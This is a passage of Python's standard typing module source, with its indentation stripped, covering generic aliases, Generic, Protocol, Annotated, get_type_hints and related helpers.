P.__bound__ == None
P.__covariant__ == False
P.__contravariant__ == False
Note that only parameter specification variables defined in global scope can
be pickled.
"""
__slots__ = ('__name__', '__bound__', '__covariant__', '__contravariant__',
'__dict__')
@property
def args(self):
return ParamSpecArgs(self)
@property
def kwargs(self):
return ParamSpecKwargs(self)
def __init__(self, name, *, bound=None, covariant=False, contravariant=False):
self.__name__ = name
super().__init__(bound, covariant, contravariant)
def_mod = _caller()
if def_mod != 'typing':
self.__module__ = def_mod
def _is_dunder(attr):
return attr.startswith('__') and attr.endswith('__')
class _BaseGenericAlias(_Final, _root=True):
"""The central part of internal API.
This represents a generic version of type 'origin' with type arguments 'params'.
There are two kind of these aliases: user defined and special. The special ones
are wrappers around builtin collections and ABCs in collections.abc. These must
have 'name' always set. If 'inst' is False, then the alias can't be instantiated,
this is used by e.g. typing.List and typing.Dict.
"""
def __init__(self, origin, *, inst=True, name=None):
self._inst = inst
self._name = name
self.__origin__ = origin
self.__slots__ = None # This is not documented.
def __call__(self, *args, **kwargs):
if not self._inst:
raise TypeError(f"Type {self._name} cannot be instantiated; "
f"use {self.__origin__.__name__}() instead")
result = self.__origin__(*args, **kwargs)
try:
result.__orig_class__ = self
except AttributeError:
pass
return result
def __mro_entries__(self, bases):
res = []
if self.__origin__ not in bases:
res.append(self.__origin__)
i = bases.index(self)
for b in bases[i+1:]:
if isinstance(b, _BaseGenericAlias) or issubclass(b, Generic):
break
else:
res.append(Generic)
return tuple(res)
def __getattr__(self, attr):
if attr in {'__name__', '__qualname__'}:
return self._name or self.__origin__.__name__
# We are careful for copy and pickle.
# Also for simplicity we just don't relay all dunder names
if '__origin__' in self.__dict__ and not _is_dunder(attr):
return getattr(self.__origin__, attr)
raise AttributeError(attr)
def __setattr__(self, attr, val):
if _is_dunder(attr) or attr in {'_name', '_inst', '_nparams',
'_typevar_types', '_paramspec_tvars'}:
super().__setattr__(attr, val)
else:
setattr(self.__origin__, attr, val)
def __instancecheck__(self, obj):
return self.__subclasscheck__(type(obj))
def __subclasscheck__(self, cls):
raise TypeError("Subscripted generics cannot be used with"
" class and instance checks")
# Special typing constructs Union, Optional, Generic, Callable and Tuple
# use three special attributes for internal bookkeeping of generic types:
# * __parameters__ is a tuple of unique free type parameters of a generic
# type, for example, Dict[T, T].__parameters__ == (T,);
# * __origin__ keeps a reference to a type that was subscripted,
# e.g., Union[T, int].__origin__ == Union, or the non-generic version of
# the type.
# * __args__ is a tuple of all arguments used in subscripting,
# e.g., Dict[T, int].__args__ == (T, int).
class _GenericAlias(_BaseGenericAlias, _root=True):
def __init__(self, origin, params, *, inst=True, name=None,
_typevar_types=TypeVar,
_paramspec_tvars=False):
super().__init__(origin, inst=inst, name=name)
if not isinstance(params, tuple):
params = (params,)
self.__args__ = tuple(... if a is _TypingEllipsis else
() if a is _TypingEmpty else
a for a in params)
self.__parameters__ = _collect_type_vars(params, typevar_types=_typevar_types)
self._typevar_types = _typevar_types
self._paramspec_tvars = _paramspec_tvars
if not name:
self.__module__ = origin.__module__
def __eq__(self, other):
if not isinstance(other, _GenericAlias):
return NotImplemented
return (self.__origin__ == other.__origin__
and self.__args__ == other.__args__)
def __hash__(self):
return hash((self.__origin__, self.__args__))
def __or__(self, right):
return Union[self, right]
def __ror__(self, left):
return Union[left, self]
@_tp_cache
def __getitem__(self, params):
if self.__origin__ in (Generic, Protocol):
# Can't subscript Generic[...] or Protocol[...].
raise TypeError(f"Cannot subscript already-subscripted {self}")
if not isinstance(params, tuple):
params = (params,)
params = tuple(_type_convert(p) for p in params)
if (self._paramspec_tvars
and any(isinstance(t, ParamSpec) for t in self.__parameters__)):
params = _prepare_paramspec_params(self, params)
else:
_check_generic(self, params, len(self.__parameters__))
subst = dict(zip(self.__parameters__, params))
new_args = []
for arg in self.__args__:
if isinstance(arg, self._typevar_types):
if isinstance(arg, ParamSpec):
arg = subst[arg]
if not _is_param_expr(arg):
raise TypeError(f"Expected a list of types, an ellipsis, "
f"ParamSpec, or Concatenate. Got {arg}")
else:
arg = subst[arg]
elif isinstance(arg, (_GenericAlias, GenericAlias, types.UnionType)):
subparams = arg.__parameters__
if subparams:
subargs = tuple(subst[x] for x in subparams)
arg = arg[subargs]
# Required to flatten out the args for CallableGenericAlias
if self.__origin__ == collections.abc.Callable and isinstance(arg, tuple):
new_args.extend(arg)
else:
new_args.append(arg)
return self.copy_with(tuple(new_args))
def copy_with(self, params):
return self.__class__(self.__origin__, params, name=self._name, inst=self._inst)
def __repr__(self):
if self._name:
name = 'typing.' + self._name
else:
name = _type_repr(self.__origin__)
args = ", ".join([_type_repr(a) for a in self.__args__])
return f'{name}[{args}]'
def __reduce__(self):
if self._name:
origin = globals()[self._name]
else:
origin = self.__origin__
args = tuple(self.__args__)
if len(args) == 1 and not isinstance(args[0], tuple):
args, = args
return operator.getitem, (origin, args)
def __mro_entries__(self, bases):
if isinstance(self.__origin__, _SpecialForm):
raise TypeError(f"Cannot subclass {self!r}")
if self._name: # generic version of an ABC or built-in class
return super().__mro_entries__(bases)
if self.__origin__ is Generic:
if Protocol in bases:
return ()
i = bases.index(self)
for b in bases[i+1:]:
if isinstance(b, _BaseGenericAlias) and b is not self:
return ()
return (self.__origin__,)
# _nparams is the number of accepted parameters, e.g. 0 for Hashable,
# 1 for List and 2 for Dict. It may be -1 if variable number of
# parameters are accepted (needs custom __getitem__).
class _SpecialGenericAlias(_BaseGenericAlias, _root=True):
def __init__(self, origin, nparams, *, inst=True, name=None):
if name is None:
name = origin.__name__
super().__init__(origin, inst=inst, name=name)
self._nparams = nparams
if origin.__module__ == 'builtins':
self.__doc__ = f'A generic version of {origin.__qualname__}.'
else:
self.__doc__ = f'A generic version of {origin.__module__}.{origin.__qualname__}.'
@_tp_cache
def __getitem__(self, params):
if not isinstance(params, tuple):
params = (params,)
msg = "Parameters to generic types must be types."
params = tuple(_type_check(p, msg) for p in params)
_check_generic(self, params, self._nparams)
return self.copy_with(params)
def copy_with(self, params):
return _GenericAlias(self.__origin__, params,
name=self._name, inst=self._inst)
def __repr__(self):
return 'typing.' + self._name
def __subclasscheck__(self, cls):
if isinstance(cls, _SpecialGenericAlias):
return issubclass(cls.__origin__, self.__origin__)
if not isinstance(cls, _GenericAlias):
return issubclass(cls, self.__origin__)
return super().__subclasscheck__(cls)
def __reduce__(self):
return self._name
def __or__(self, right):
return Union[self, right]
def __ror__(self, left):
return Union[left, self]
class _CallableGenericAlias(_GenericAlias, _root=True):
def __repr__(self):
assert self._name == 'Callable'
args = self.__args__
if len(args) == 2 and _is_param_expr(args[0]):
return super().__repr__()
return (f'typing.Callable'
f'[[{", ".join([_type_repr(a) for a in args[:-1]])}], '
f'{_type_repr(args[-1])}]')
def __reduce__(self):
args = self.__args__
if not (len(args) == 2 and _is_param_expr(args[0])):
args = list(args[:-1]), args[-1]
return operator.getitem, (Callable, args)
class _CallableType(_SpecialGenericAlias, _root=True):
def copy_with(self, params):
return _CallableGenericAlias(self.__origin__, params,
name=self._name, inst=self._inst,
_typevar_types=(TypeVar, ParamSpec),
_paramspec_tvars=True)
def __getitem__(self, params):
if not isinstance(params, tuple) or len(params) != 2:
raise TypeError("Callable must be used as "
"Callable[[arg, ...], result].")
args, result = params
# This relaxes what args can be on purpose to allow things like
# PEP 612 ParamSpec. Responsibility for whether a user is using
# Callable[...] properly is deferred to static type checkers.
if isinstance(args, list):
params = (tuple(args), result)
else:
params = (args, result)
return self.__getitem_inner__(params)
@_tp_cache
def __getitem_inner__(self, params):
args, result = params
msg = "Callable[args, result]: result must be a type."
result = _type_check(result, msg)
if args is Ellipsis:
return self.copy_with((_TypingEllipsis, result))
if not isinstance(args, tuple):
args = (args,)
args = tuple(_type_convert(arg) for arg in args)
params = args + (result,)
return self.copy_with(params)
class _TupleType(_SpecialGenericAlias, _root=True):
@_tp_cache
def __getitem__(self, params):
if params == ():
return self.copy_with((_TypingEmpty,))
if not isinstance(params, tuple):
params = (params,)
if len(params) == 2 and params[1] is ...:
msg = "Tuple[t, ...]: t must be a type."
p = _type_check(params[0], msg)
return self.copy_with((p, _TypingEllipsis))
msg = "Tuple[t0, t1, ...]: each t must be a type."
params = tuple(_type_check(p, msg) for p in params)
return self.copy_with(params)
class _UnionGenericAlias(_GenericAlias, _root=True):
def copy_with(self, params):
return Union[params]
def __eq__(self, other):
if not isinstance(other, (_UnionGenericAlias, types.UnionType)):
return NotImplemented
return set(self.__args__) == set(other.__args__)
def __hash__(self):
return hash(frozenset(self.__args__))
def __repr__(self):
args = self.__args__
if len(args) == 2:
if args[0] is type(None):
return f'typing.Optional[{_type_repr(args[1])}]'
elif args[1] is type(None):
return f'typing.Optional[{_type_repr(args[0])}]'
return super().__repr__()
def __instancecheck__(self, obj):
return self.__subclasscheck__(type(obj))
def __subclasscheck__(self, cls):
for arg in self.__args__:
if issubclass(cls, arg):
return True
def __reduce__(self):
func, (origin, args) = super().__reduce__()
return func, (Union, args)
def _value_and_type_iter(parameters):
return ((p, type(p)) for p in parameters)
class _LiteralGenericAlias(_GenericAlias, _root=True):
def __eq__(self, other):
if not isinstance(other, _LiteralGenericAlias):
return NotImplemented
return set(_value_and_type_iter(self.__args__)) == set(_value_and_type_iter(other.__args__))
def __hash__(self):
return hash(frozenset(_value_and_type_iter(self.__args__)))
class _ConcatenateGenericAlias(_GenericAlias, _root=True):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs,
_typevar_types=(TypeVar, ParamSpec),
_paramspec_tvars=True)
class Generic:
"""Abstract base class for generic types.
A generic type is typically declared by inheriting from
this class parameterized with one or more type variables.
For example, a generic mapping type might be defined as::
class Mapping(Generic[KT, VT]):
def __getitem__(self, key: KT) -> VT:
...
# Etc.
This class can then be used as follows::
def lookup_name(mapping: Mapping[KT, VT], key: KT, default: VT) -> VT:
try:
return mapping[key]
except KeyError:
return default
"""
__slots__ = ()
_is_protocol = False
@_tp_cache
def __class_getitem__(cls, params):
if not isinstance(params, tuple):
params = (params,)
if not params and cls is not Tuple:
raise TypeError(
f"Parameter list to {cls.__qualname__}[...] cannot be empty")
params = tuple(_type_convert(p) for p in params)
if cls in (Generic, Protocol):
# Generic and Protocol can only be subscripted with unique type variables.
if not all(isinstance(p, (TypeVar, ParamSpec)) for p in params):
raise TypeError(
f"Parameters to {cls.__name__}[...] must all be type variables "
f"or parameter specification variables.")
if len(set(params)) != len(params):
raise TypeError(
f"Parameters to {cls.__name__}[...] must all be unique")
else:
# Subscripting a regular Generic subclass.
if any(isinstance(t, ParamSpec) for t in cls.__parameters__):
params = _prepare_paramspec_params(cls, params)
else:
_check_generic(cls, params, len(cls.__parameters__))
return _GenericAlias(cls, params,
_typevar_types=(TypeVar, ParamSpec),
_paramspec_tvars=True)
def __init_subclass__(cls, *args, **kwargs):
super().__init_subclass__(*args, **kwargs)
tvars = []
if '__orig_bases__' in cls.__dict__:
error = Generic in cls.__orig_bases__
else:
error = Generic in cls.__bases__ and cls.__name__ != 'Protocol'
if error:
raise TypeError("Cannot inherit from plain Generic")
if '__orig_bases__' in cls.__dict__:
tvars = _collect_type_vars(cls.__orig_bases__, (TypeVar, ParamSpec))
# Look for Generic[T1, ..., Tn].
# If found, tvars must be a subset of it.
# If not found, tvars is it.
# Also check for and reject plain Generic,
# and reject multiple Generic[...].
gvars = None
for base in cls.__orig_bases__:
if (isinstance(base, _GenericAlias) and
base.__origin__ is Generic):
if gvars is not None:
raise TypeError(
"Cannot inherit from Generic[...] multiple types.")
gvars = base.__parameters__
if gvars is not None:
tvarset = set(tvars)
gvarset = set(gvars)
if not tvarset <= gvarset:
s_vars = ', '.join(str(t) for t in tvars if t not in gvarset)
s_args = ', '.join(str(g) for g in gvars)
raise TypeError(f"Some type variables ({s_vars}) are"
f" not listed in Generic[{s_args}]")
tvars = gvars
cls.__parameters__ = tuple(tvars)
class _TypingEmpty:
"""Internal placeholder for () or []. Used by TupleMeta and CallableMeta
to allow empty list/tuple in specific places, without allowing them
to sneak in where prohibited.
"""
class _TypingEllipsis:
"""Internal placeholder for ... (ellipsis)."""
_TYPING_INTERNALS = ['__parameters__', '__orig_bases__', '__orig_class__',
'_is_protocol', '_is_runtime_protocol']
_SPECIAL_NAMES = ['__abstractmethods__', '__annotations__', '__dict__', '__doc__',
'__init__', '__module__', '__new__', '__slots__',
'__subclasshook__', '__weakref__', '__class_getitem__']
# These special attributes will be not collected as protocol members.
EXCLUDED_ATTRIBUTES = _TYPING_INTERNALS + _SPECIAL_NAMES + ['_MutableMapping__marker']
def _get_protocol_attrs(cls):
"""Collect protocol members from a protocol class objects.
This includes names actually defined in the class dictionary, as well
as names that appear in annotations. Special names (above) are skipped.
"""
attrs = set()
for base in cls.__mro__[:-1]: # without object
if base.__name__ in ('Protocol', 'Generic'):
continue
annotations = getattr(base, '__annotations__', {})
for attr in list(base.__dict__.keys()) + list(annotations.keys()):
if not attr.startswith('_abc_') and attr not in EXCLUDED_ATTRIBUTES:
attrs.add(attr)
return attrs
def _is_callable_members_only(cls):
# PEP 544 prohibits using issubclass() with protocols that have non-method members.
return all(callable(getattr(cls, attr, None)) for attr in _get_protocol_attrs(cls))
def _no_init_or_replace_init(self, *args, **kwargs):
cls = type(self)
if cls._is_protocol:
raise TypeError('Protocols cannot be instantiated')
# Already using a custom `__init__`. No need to calculate correct
# `__init__` to call. This can lead to RecursionError. See bpo-45121.
if cls.__init__ is not _no_init_or_replace_init:
return
# Initially, `__init__` of a protocol subclass is set to `_no_init_or_replace_init`.
# The first instantiation of the subclass will call `_no_init_or_replace_init` which
# searches for a proper new `__init__` in the MRO. The new `__init__`
# replaces the subclass' old `__init__` (ie `_no_init_or_replace_init`). Subsequent
# instantiation of the protocol subclass will thus use the new
# `__init__` and no longer call `_no_init_or_replace_init`.
for base in cls.__mro__:
init = base.__dict__.get('__init__', _no_init_or_replace_init)
if init is not _no_init_or_replace_init:
cls.__init__ = init
break
else:
# should not happen
cls.__init__ = object.__init__
cls.__init__(self, *args, **kwargs)
def _caller(depth=1, default='__main__'):
try:
return sys._getframe(depth + 1).f_globals.get('__name__', default)
except (AttributeError, ValueError): # For platforms without _getframe()
return None
def _allow_reckless_class_checks(depth=3):
"""Allow instance and class checks for special stdlib modules.
The abc and functools modules indiscriminately call isinstance() and
issubclass() on the whole MRO of a user class, which may contain protocols.
"""
return _caller(depth) in {'abc', 'functools', None}
_PROTO_ALLOWLIST = {
'collections.abc': [
'Callable', 'Awaitable', 'Iterable', 'Iterator', 'AsyncIterable',
'Hashable', 'Sized', 'Container', 'Collection', 'Reversible',
],
'contextlib': ['AbstractContextManager', 'AbstractAsyncContextManager'],
}
class _ProtocolMeta(ABCMeta):
# This metaclass is really unfortunate and exists only because of
# the lack of __instancehook__.
def __instancecheck__(cls, instance):
# We need this method for situations where attributes are
# assigned in __init__.
if (
getattr(cls, '_is_protocol', False) and
not getattr(cls, '_is_runtime_protocol', False) and
not _allow_reckless_class_checks(depth=2)
):
raise TypeError("Instance and class checks can only be used with"
" @runtime_checkable protocols")
if ((not getattr(cls, '_is_protocol', False) or
_is_callable_members_only(cls)) and
issubclass(instance.__class__, cls)):
return True
if cls._is_protocol:
if all(hasattr(instance, attr) and
# All *methods* can be blocked by setting them to None.
(not callable(getattr(cls, attr, None)) or
getattr(instance, attr) is not None)
for attr in _get_protocol_attrs(cls)):
return True
return super().__instancecheck__(instance)
class Protocol(Generic, metaclass=_ProtocolMeta):
"""Base class for protocol classes.
Protocol classes are defined as::
class Proto(Protocol):
def meth(self) -> int:
...
Such classes are primarily used with static type checkers that recognize
structural subtyping (static duck-typing), for example::
class C:
def meth(self) -> int:
return 0
def func(x: Proto) -> int:
return x.meth()
func(C()) # Passes static type check
See PEP 544 for details. Protocol classes decorated with
@typing.runtime_checkable act as simple-minded runtime protocols that check
only the presence of given attributes, ignoring their type signatures.
Protocol classes can be generic, they are defined as::
class GenProto(Protocol[T]):
def meth(self) -> T:
...
"""
__slots__ = ()
_is_protocol = True
_is_runtime_protocol = False
def __init_subclass__(cls, *args, **kwargs):
super().__init_subclass__(*args, **kwargs)
# Determine if this is a protocol or a concrete subclass.
if not cls.__dict__.get('_is_protocol', False):
cls._is_protocol = any(b is Protocol for b in cls.__bases__)
# Set (or override) the protocol subclass hook.
def _proto_hook(other):
if not cls.__dict__.get('_is_protocol', False):
return NotImplemented
# First, perform various sanity checks.
if not getattr(cls, '_is_runtime_protocol', False):
if _allow_reckless_class_checks():
return NotImplemented
raise TypeError("Instance and class checks can only be used with"
" @runtime_checkable protocols")
if not _is_callable_members_only(cls):
if _allow_reckless_class_checks():
return NotImplemented
raise TypeError("Protocols with non-method members"
" don't support issubclass()")
if not isinstance(other, type):
# Same error message as for issubclass(1, int).
raise TypeError('issubclass() arg 1 must be a class')
# Second, perform the actual structural compatibility check.
for attr in _get_protocol_attrs(cls):
for base in other.__mro__:
# Check if the members appears in the class dictionary...
if attr in base.__dict__:
if base.__dict__[attr] is None:
return NotImplemented
break
# ...or in annotations, if it is a sub-protocol.
annotations = getattr(base, '__annotations__', {})
if (isinstance(annotations, collections.abc.Mapping) and
attr in annotations and
issubclass(other, Generic) and other._is_protocol):
break
else:
return NotImplemented
return True
if '__subclasshook__' not in cls.__dict__:
cls.__subclasshook__ = _proto_hook
# We have nothing more to do for non-protocols...
if not cls._is_protocol:
return
# ... otherwise check consistency of bases, and prohibit instantiation.
for base in cls.__bases__:
if not (base in (object, Generic) or
base.__module__ in _PROTO_ALLOWLIST and
base.__name__ in _PROTO_ALLOWLIST[base.__module__] or
issubclass(base, Generic) and base._is_protocol):
raise TypeError('Protocols can only inherit from other'
' protocols, got %r' % base)
cls.__init__ = _no_init_or_replace_init
class _AnnotatedAlias(_GenericAlias, _root=True):
"""Runtime representation of an annotated type.
At its core 'Annotated[t, dec1, dec2, ...]' is an alias for the type 't'
with extra annotations. The alias behaves like a normal typing alias,
instantiating is the same as instantiating the underlying type, binding
it to types is also the same.
"""
def __init__(self, origin, metadata):
if isinstance(origin, _AnnotatedAlias):
metadata = origin.__metadata__ + metadata
origin = origin.__origin__
super().__init__(origin, origin)
self.__metadata__ = metadata
def copy_with(self, params):
assert len(params) == 1
new_type = params[0]
return _AnnotatedAlias(new_type, self.__metadata__)
def __repr__(self):
return "typing.Annotated[{}, {}]".format(
_type_repr(self.__origin__),
", ".join(repr(a) for a in self.__metadata__)
)
def __reduce__(self):
return operator.getitem, (
Annotated, (self.__origin__,) + self.__metadata__
)
def __eq__(self, other):
if not isinstance(other, _AnnotatedAlias):
return NotImplemented
return (self.__origin__ == other.__origin__
and self.__metadata__ == other.__metadata__)
def __hash__(self):
return hash((self.__origin__, self.__metadata__))
def __getattr__(self, attr):
if attr in {'__name__', '__qualname__'}:
return 'Annotated'
return super().__getattr__(attr)
class Annotated:
"""Add context specific metadata to a type.
Example: Annotated[int, runtime_check.Unsigned] indicates to the
hypothetical runtime_check module that this type is an unsigned int.
Every other consumer of this type can ignore this metadata and treat
this type as int.
The first argument to Annotated must be a valid type.
Details:
- It's an error to call `Annotated` with less than two arguments.
- Nested Annotated are flattened::
Annotated[Annotated[T, Ann1, Ann2], Ann3] == Annotated[T, Ann1, Ann2, Ann3]
- Instantiating an annotated type is equivalent to instantiating the
underlying type::
Annotated[C, Ann1](5) == C(5)
- Annotated can be used as a generic type alias::
Optimized = Annotated[T, runtime.Optimize()]
Optimized[int] == Annotated[int, runtime.Optimize()]
OptimizedList = Annotated[List[T], runtime.Optimize()]
OptimizedList[int] == Annotated[List[int], runtime.Optimize()]
"""
__slots__ = ()
def __new__(cls, *args, **kwargs):
raise TypeError("Type Annotated cannot be instantiated.")
@_tp_cache
def __class_getitem__(cls, params):
if not isinstance(params, tuple) or len(params) < 2:
raise TypeError("Annotated[...] should be used "
"with at least two arguments (a type and an "
"annotation).")
msg = "Annotated[t, ...]: t must be a type."
origin = _type_check(params[0], msg)
metadata = tuple(params[1:])
return _AnnotatedAlias(origin, metadata)
def __init_subclass__(cls, *args, **kwargs):
raise TypeError(
"Cannot subclass {}.Annotated".format(cls.__module__)
)
def runtime_checkable(cls):
"""Mark a protocol class as a runtime protocol.
Such protocol can be used with isinstance() and issubclass().
Raise TypeError if applied to a non-protocol class.
This allows a simple-minded structural check very similar to
one trick ponies in collections.abc such as Iterable.
For example::
@runtime_checkable
class Closable(Protocol):
def close(self): ...
assert isinstance(open('/some/file'), Closable)
Warning: this will check only the presence of the required methods,
not their type signatures!
"""
if not issubclass(cls, Generic) or not cls._is_protocol:
raise TypeError('@runtime_checkable can be only applied to protocol classes,'
' got %r' % cls)
cls._is_runtime_protocol = True
return cls
def cast(typ, val):
"""Cast a value to a type.
This returns the value unchanged. To the type checker this
signals that the return value has the designated type, but at
runtime we intentionally don't check anything (we want this
to be as fast as possible).
"""
return val
def _get_defaults(func):
"""Internal helper to extract the default arguments, by name."""
try:
code = func.__code__
except AttributeError:
# Some built-in functions don't have __code__, __defaults__, etc.
return {}
pos_count = code.co_argcount
arg_names = code.co_varnames
arg_names = arg_names[:pos_count]
defaults = func.__defaults__ or ()
kwdefaults = func.__kwdefaults__
res = dict(kwdefaults) if kwdefaults else {}
pos_offset = pos_count - len(defaults)
for name, value in zip(arg_names[pos_offset:], defaults):
assert name not in res
res[name] = value
return res
_allowed_types = (types.FunctionType, types.BuiltinFunctionType,
types.MethodType, types.ModuleType,
WrapperDescriptorType, MethodWrapperType, MethodDescriptorType)
def get_type_hints(obj, globalns=None, localns=None, include_extras=False):
"""Return type hints for an object.
This is often the same as obj.__annotations__, but it handles
forward references encoded as string literals, adds Optional[t] if a
default value equal to None is set and recursively replaces all
'Annotated[T, ...]' with 'T' (unless 'include_extras=True').
The argument may be a module, class, method, or function. The annotations
are returned as a dictionary. For classes, annotations include also
inherited members.
TypeError is raised if the argument is not of a type that can contain
annotations, and an empty dictionary is returned if no annotations are
present.
BEWARE -- the behavior of globalns and localns is counterintuitive
(unless you are familiar with how eval() and exec() work). The
search order is locals first, then globals.
- If no dict arguments are passed, an attempt is made to use the
globals from obj (or the respective module's globals for classes),
and these are also used as the locals. If the object does not appear
to have globals, an empty dictionary is used. For classes, the search
order is globals first then locals.
- If one dict argument is passed, it is used for both globals and
locals.
- If two dict arguments are passed, they specify globals and
locals, respectively.
"""
if getattr(obj, '__no_type_check__', None):
return {}
# Classes require a special treatment.
if isinstance(obj, type):
hints = {}
for base in reversed(obj.__mro__):
if globalns is None:
base_globals = getattr(sys.modules.get(base.__module__, None), '__dict__', {})
else:
base_globals = globalns
ann = base.__dict__.get('__annotations__', {})
if isinstance(ann, types.GetSetDescriptorType):
ann = {}
base_locals = dict(vars(base)) if localns is None else localns
if localns is None and globalns is None:
# This is surprising, but required. Before Python 3.10,
# get_type_hints only evaluated the globalns of
# a class. To maintain backwards compatibility, we reverse
# the globalns and localns order so that eval() looks into
# *base_globals* first rather than *base_locals*.
# This only affects ForwardRefs.
base_globals, base_locals = base_locals, base_globals
for name, value in ann.items():
if value is None:
value = type(None)
if isinstance(value, str):
value = ForwardRef(value, is_argument=False, is_class=True)
value = _eval_type(value, base_globals, base_locals)
hints[name] = value
return hints if include_extras else {k: _strip_annotations(t) for k, t in hints.items()}
if globalns is None:
if isinstance(obj, types.ModuleType):
globalns = obj.__dict__
else:
nsobj = obj
# Find globalns for the unwrapped object.
while hasattr(nsobj, '__wrapped__'):
nsobj = nsobj.__wrapped__
globalns = getattr(nsobj, '__globals__', {})
if localns is None:
localns = globalns
elif localns is None:
localns = globalns
hints = getattr(obj, '__annotations__', None)
if hints is None:
# Return empty annotations for something that _could_ have them.
if isinstance(obj, _allowed_types):
return {}
else:
raise TypeError('{!r} is not a module, class, method, '
'or function.'.format(obj))
defaults = _get_defaults(obj)
hints = dict(hints)
for name, value in hints.items():
if value is None:
value = type(None)
if isinstance(value, str):
# class-level forward refs were handled above, this must be either
# a module-level annotation or a function argument annotation
value = ForwardRef(
value,
is_argument=not isinstance(obj, types.ModuleType),
is_class=False,
)
value = _eval_type(value, globalns, localns)
if name in defaults and defaults[name] is None:
value = Optional[value]
hints[name] = value
return hints if include_extras else {k: _strip_annotations(t) for k, t in hints.items()}
def _strip_annotations(t):
"""Strips the annotations from a given type.
"""
if isinstance(t, _AnnotatedAlias):
return _strip_annotations(t.__origin__)
if isinstance(t, _GenericAlias):
stripped_args = tuple(_strip_annotations(a) for a in t.__args__)
if stripped_args == t.__args__:
return t
return t.copy_with(stripped_args)
if isinstance(t, GenericAlias):
stripped_args = tuple(_strip_annotations(a) for a in t.__args__)
if stripped_args == t.__args__:
return t
return GenericAlias(t.__origin__, stripped_args)
if isinstance(t, types.UnionType):
stripped_args = tuple(_strip_annotations(a) for a in t.__args__)
if stripped_args == t.__args__:
return t
return functools.reduce(operator.or_, stripped_args)
return t
def get_origin(tp):
"""Get the unsubscripted version of a type.
This supports generic types, Callable, Tuple, Union, Literal, Final, ClassVar
and Annotated. Return None for unsupported types. Examples::
get_origin(Literal[42]) is Literal
get_origin(int) is None
get_origin(ClassVar[int]) is ClassVar
get_origin(Generic) is Generic
get_origin(Generic[T]) is Generic
get_origin(Union[T, int]) is Union
get_origin(List[Tuple[T, T]][int]) == list
get_origin(P.args) is P
"""
if isinstance(tp, _AnnotatedAlias):
return Annotated
if isinstance(tp, (_BaseGenericAlias, GenericAlias,
ParamSpecArgs, ParamSpecKwargs)):
return tp.__origin__
if tp is Generic:
return Generic
if isinstance(tp, types.UnionType):
return types.UnionType
return None
def get_args(tp):
"""Get type arguments with all substitutions performed.
For unions, basic simplifications used by Union constructor are performed.
Examples::
get_args(Dict[str, int]) == (str, int)
get_args(int) == ()
get_args(Union[int, Union[T, int], str][int]) == (int, str)
get_args(Union[int, Tuple[T, int]][str]) == (int, Tuple[str, int])
get_args(Callable[[], T][int]) == ([], int)
"""
if isinstance(tp, _AnnotatedAlias):
return (tp.__origin__,) + tp.__metadata__
if isinstance(tp, (_GenericAlias, GenericAlias)):
res = tp.__args__
if (tp.__origin__ is collections.abc.Callable
and not (len(res) == 2 and _is_param_expr(res[0]))):
res = (list(res[:-1]), res[-1])
return res
if isinstance(tp, types.UnionType):
return tp.__args__
return ()
def is_typeddict(tp):
"""Check if an annotation is a TypedDict class
For example::
class Film(TypedDict):
title: str
year: int
is_typeddict(Film) # => True
is_typeddict(Union[list, str]) # => False
"""
return isinstance(tp, _TypedDictMeta)
def no_type_check(arg):
"""Decorator to indicate that annotations are not type hints.
The argument must be a class or function; if it is a class, it
applies recursively to all methods and classes defined in that class
(but not to methods defined in its superclasses or subclasses).
This mutates the function(s) or class(es) in place.
"""
if isinstance(arg, type):
arg_attrs = arg.__dict__.copy()
for attr, val in arg.__dict__.items():
if val in arg.__bases__ + (arg,):
arg_attrs.pop(attr)
for obj in arg_attrs.values():
if isinstance(obj, types.FunctionType):
obj.__no_type_check__ = True
if isinstance(obj, type):
no_type_check(obj)
try:
arg.__no_type_check__ = True
except TypeError: # built-in classes
pass
return arg
def no_type_check_decorator(decorator):
"""Decorator to give another decorator the @no_type_check effect.
This wraps the decorator with something that wraps the decorated
function in @no_type_check.
"""
@functools.wraps(decorator)
def wrapped_decorator(*args, **kwds):
func = decorator(*args, **kwds)
func = no_type_check(func)
return func
return wrapped_decorator
def _overload_dummy(*args, **kwds):
"""Helper for @overload to raise when called."""
raise NotImplementedError(
"You should not call an overloaded function. "
"A series of @overload-decorated functions "
"outside a stub module should always be followed "
"by an implementation that is not @overload-ed.")
def overload(func):
"""Decorator for overloaded functions/methods.
In a stub file, place two or more stub definitions for the same
function in a row, each decorated with @overload. For example:
@overload
def utf8(value: None) -> None: ...
@overload
def utf8(value: bytes) -> bytes: ...
@overload
def utf8(value: str) -> bytes: ...
In a non-stub file (i.e. a regular .py file), do the same but
follow it with an implementation. The implementation should *not*
be decorated with @overload. For example:
@overload
def utf8(value: None) -> None: ...
@overload
def utf8(value: bytes) -> bytes: ...
@overload
def utf8(value: str) -> bytes: ...
def utf8(value):
# implementation goes here
"""
return _overload_dummy
def final(f):
"""A decorator to indicate final methods and final classes.
Use this decorator to indicate to type checkers that the decorated
method cannot be overridden, and decorated class cannot be subclassed.
For example:
class Base:
@final
def done(self) -> None:
...
class Sub(Base):
def done(self) -> None: # Error reported by type checker
...
@final
class Leaf:
...
class Other(Leaf): # Error reported by type checker
...
There is no runtime checking of these properties.
"""
return f
# Some unconstrained type variables. These are used by the container types.
# (These are not for export.)
T = TypeVar('T') # Any type.
KT = TypeVar('KT') # Key type.
VT = TypeVar('VT') # Value type.
T_co = TypeVar('T_co', covariant=True) # Any type covariant containers.
V_co = TypeVar('V_co', covariant=True) # Any type covariant containers.
VT_co = TypeVar('VT_co', covariant=True) # Value type covariant containers.
T_contra = TypeVar('T_contra', contravariant=True) # Ditto contravariant.
# Internal type variable used for Type[].
CT_co = TypeVar('CT_co', covariant=True, bound=type)
# A useful type variable with constraints. This represents string types.
# (This one *is* for export!)
AnyStr = TypeVar('AnyStr', bytes, str)
# Various ABCs mimicking those in collections.abc.
_alias = _SpecialGenericAlias
Hashable = _alias(collections.abc.Hashable, 0) # Not generic.
Awaitable = _alias(collections.abc.Awaitable, 1)
Coroutine = _alias(collections.abc.Coroutine, 3)
AsyncIterable = _alias(collections.abc.AsyncIterable, 1)
AsyncIterator = _alias(collections.abc.AsyncIterator, 1)
Iterable = _alias(collections.abc.Iterable, 1)
Iterator = _alias(collections.abc.Iterator, 1)
Reversible = _alias(collections.abc.Reversible, 1)
Sized = _alias(collections.abc.Sized, 0) # Not generic.
Container = _alias(collections.abc.Container, 1)
Collection = _alias(collections.abc.Collection, 1)
Callable = _CallableType(collections.abc.Callable, 2)
Callable.__doc__ = \
"""Callable type; Callable[[int], str] is a function of (int) -> str.
The subscription syntax must always be used with exactly two
